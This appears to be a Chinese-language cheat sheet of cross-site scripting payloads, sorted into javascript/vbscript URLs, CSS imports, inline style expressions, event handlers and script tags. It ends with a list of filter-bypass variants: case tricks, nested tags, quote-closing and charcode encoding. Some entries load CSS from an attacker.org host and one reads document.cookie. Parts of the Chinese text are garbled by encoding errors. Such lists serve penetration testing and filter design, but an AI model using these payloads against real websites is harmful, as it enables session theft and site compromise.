1.5??????XSS Payload

第一類：Javascript URL

<a href="javascript:alert(‘test‘)">link</a>

<a href="javascript:alert(‘xss‘)">link</a>

<a href=‘vbscript:MsgBox("XSS")‘>link</a>

<a href="vbscript:alert(1)">Hello</a>

<a href="vbscript:alert(1)">Hello</a>

第二類：CSS import

<style>@import url("http://attacker.org/malicious.css");</style>

<style>@imp\ort url("http://attacker.org/malicious.css");</style>

<STYLE>@im\port‘\ja\vasc\ript:alert("XSS")‘;</STYLE>

<STYLE>@import‘http://jb51.net/xss.css‘;</STYLE>

第三類：Inline style

<div style="color: expression(alert(‘XSS‘))">

<div style=color:expression\(alert(1))></div>

<div style="color: ‘<‘; color: expression(alert(‘XSS‘))">

<div style=X:expression(alert(/xss/))>

<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">

第四類：JavaScript?事件

<div onclick="alert(‘xss‘)">

<div onmouseenter="alert(‘xss‘)">

<div onclick ="alert(‘xss‘)">

<BODY ONLOAD=alert(‘XSS‘)>

<img src=1 onerror=alert(1)>

<img/src=‘1‘/onerror=alert(0)>

第五類：Script?標(biāo)簽

<script src="http://baidu.com"></script>

<script>alert("XSS")</script>

<scr<script>ipt>alert("XSS")</scr<script>ipt>

<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>

<script>alert(/1/.source)</script>

<script>alert(1);</script>

一個(gè)一個(gè)試，推理一下

DOM型，存儲(chǔ)型，反射性，大小寫(xiě)繞過(guò)，黑名單繞過(guò)，編碼繞過(guò)，onclick事件繞過(guò)

關(guān)鍵詞：閉合字符，alert，script，<>,',",(),URL編碼，ASCII/10進(jìn)制轉(zhuǎn)換

<script>alert(1)</script>

alert(/xss/)

";alert(/xss/)//

"><script>alert('xss')</script><"

<script>alert(document.cookie)</script>

<Script>alert("ANY")</Script>

"> <Script>alert('handsome boy')</script> //

<scr<script>ipt>alert("ANY")</scr</script>ipt>

<img src=1 onerror=alert("ANY")>

"> <scscriptript>alert`xss`</scscriptript> //

oninput=alert`1`

<a herf="x" onclick="alert(/xss/)">test</a>

"<script>alert('xss')</script>"

" onchange='alert(1)' "

<script>AlerT("ANY")</script>

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>

oninput=alert`1`

"> <a href="javascript:%61lert(1)">click me</a> //